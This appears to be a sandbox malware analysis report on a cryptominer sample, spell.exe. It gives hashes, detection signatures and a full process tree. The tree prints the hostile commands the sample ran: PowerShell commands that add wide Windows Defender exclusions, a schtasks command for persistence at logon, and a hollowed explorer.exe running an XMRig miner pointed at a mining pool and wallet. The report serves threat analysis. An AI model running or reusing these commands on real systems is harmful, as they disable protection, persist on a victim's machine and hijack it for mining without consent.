Analysis
-
max time kernel
2699s -
max time network
2691s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
29/06/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
spell.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
spell.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
spell.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
spell.exe
Resource
win10v2004-20240508-en
General
-
Target
spell.exe
-
Size
2.1MB
-
MD5
ac109c80097d1d932ab66fc11e19b61f
-
SHA1
2d8eb980764fae4a728431e32321609a45f6741d
-
SHA256
dd5a76a2520d25db4010b9c27e6e6b3033995b72b18954f095215e08137850f6
-
SHA512
bb893cc7cb0eee04048390d92515dcf3e689eea15e67d8b461b26720d8ab2d127afc55cb006ab2088454346fb506f0a2e09004740b736da3f3bfacc5461f1b58
-
SSDEEP
49152:Get5GEw9XDPGmUI/LVuSO5q2OCvBc6laoCBpsFC6:HRw9XDuZI/YDlOCZc6la3sY6
Malware Config
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral4/memory/920-67-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-69-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-74-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-72-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-71-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-75-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-73-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-88-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-90-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-91-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral4/memory/920-92-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4840 powershell.exe 5036 powershell.exe 4908 powershell.exe 1368 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2920 services64.exe 4000 sihost64.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4732 set thread context of 920 4732 conhost.exe 105 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1880 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2752 conhost.exe 1368 powershell.exe 1368 powershell.exe 4840 powershell.exe 4840 powershell.exe 4732 conhost.exe 4732 conhost.exe 5036 powershell.exe 5036 powershell.exe 4908 powershell.exe 4908 powershell.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe 920 explorer.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2752 conhost.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 4840 powershell.exe Token: SeDebugPrivilege 4732 conhost.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeLockMemoryPrivilege 920 explorer.exe Token: SeLockMemoryPrivilege 920 explorer.exe Token: SeDebugPrivilege 4908 powershell.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1320 wrote to memory of 2752 1320 spell.exe 81 PID 1320 wrote to memory of 2752 1320 spell.exe 81 PID 1320 wrote to memory of 2752 1320 spell.exe 81 PID 2752 wrote to memory of 3876 2752 conhost.exe 82 PID 2752 wrote to memory of 3876 2752 conhost.exe 82 PID 3876 wrote to memory of 1368 3876 cmd.exe 85 PID 3876 wrote to memory of 1368 3876 cmd.exe 85 PID 2752 wrote to memory of 620 2752 conhost.exe 86 PID 2752 wrote to memory of 620 2752 conhost.exe 86 PID 620 wrote to memory of 1880 620 cmd.exe 88 PID 620 wrote to memory of 1880 620 cmd.exe 88 PID 3876 wrote to memory of 4840 3876 cmd.exe 89 PID 3876 wrote to memory of 4840 3876 cmd.exe 89 PID 2752 wrote to memory of 4624 2752 conhost.exe 96 PID 2752 wrote to memory of 4624 2752 conhost.exe 96 PID 4624 wrote to memory of 2920 4624 cmd.exe 98 PID 4624 wrote to memory of 2920 4624 cmd.exe 98 PID 2920 wrote to memory of 4732 2920 services64.exe 99 PID 2920 wrote to memory of 4732 2920 services64.exe 99 PID 2920 wrote to memory of 4732 2920 services64.exe 99 PID 4732 wrote to memory of 848 4732 conhost.exe 100 PID 4732 wrote to memory of 848 4732 conhost.exe 100 PID 848 wrote to memory of 5036 848 cmd.exe 102 PID 848 wrote to memory of 5036 848 cmd.exe 102 PID 4732 wrote to memory of 4000 4732 conhost.exe 103 PID 4732 wrote to memory of 4000 4732 conhost.exe 103 PID 4000 wrote to memory of 3704 4000 sihost64.exe 104 PID 4000 wrote to memory of 3704 4000 sihost64.exe 104 PID 4000 wrote to memory of 3704 4000 sihost64.exe 104 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 4732 wrote to memory of 920 4732 conhost.exe 105 PID 848 wrote to memory of 4908 848 cmd.exe 106 PID 848 wrote to memory of 4908 848 cmd.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\spell.exe"C:\Users\Admin\AppData\Local\Temp\spell.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\spell.exe"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1880
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"5⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:3704
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=45fPKuDFXtpFRPKFCiNDZVjNuTSAMd8XwS2ouV1hWy7s5y6rn1fjfbXL8sJNAZSMS4EXhvbKisPeuEb24XchsUSeBXdQxrL --pass=SPELL --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --tls --cinit-stealth6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD510890cda4b6eab618e926c4118ab0647
SHA11e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA25600f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221
-
Filesize
944B
MD546b170302a5821687d8c622f10947f27
SHA147a91ea3e248bd99dc87211be7e2844dda0687df
SHA256e3cdd1b49dca63bf255aead7a7535cc6fc085425ff5ac48975d62c37af6a689e
SHA512e6f9e562876591cb959d5650cf9ef1eb2a87d5a154bd5f8c37f6697c7fd48d959014bcb2aab96b9c41498a465e9d0f114be276514e2be59dcb019334e3dfe7cb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32KB
MD5069a6f7a77eaf05c4145ec872579f07e
SHA102bdf233197e979bb99343c7473c20492972187b
SHA25659c8dc7bbbe8ea1a8ecd01e8a780f8af39309717fb0f6e44c583579e91674860
SHA5122c1d29f817417e0298137bb3e3b7fc94af6dab084a7a7575fe11431c7d2766e89f4074e99583b327025beaf3e53e08b8a1844e1e9ef93f1e9e2b2a4d66e39306
-
Filesize
2.1MB
MD5ac109c80097d1d932ab66fc11e19b61f
SHA12d8eb980764fae4a728431e32321609a45f6741d
SHA256dd5a76a2520d25db4010b9c27e6e6b3033995b72b18954f095215e08137850f6
SHA512bb893cc7cb0eee04048390d92515dcf3e689eea15e67d8b461b26720d8ab2d127afc55cb006ab2088454346fb506f0a2e09004740b736da3f3bfacc5461f1b58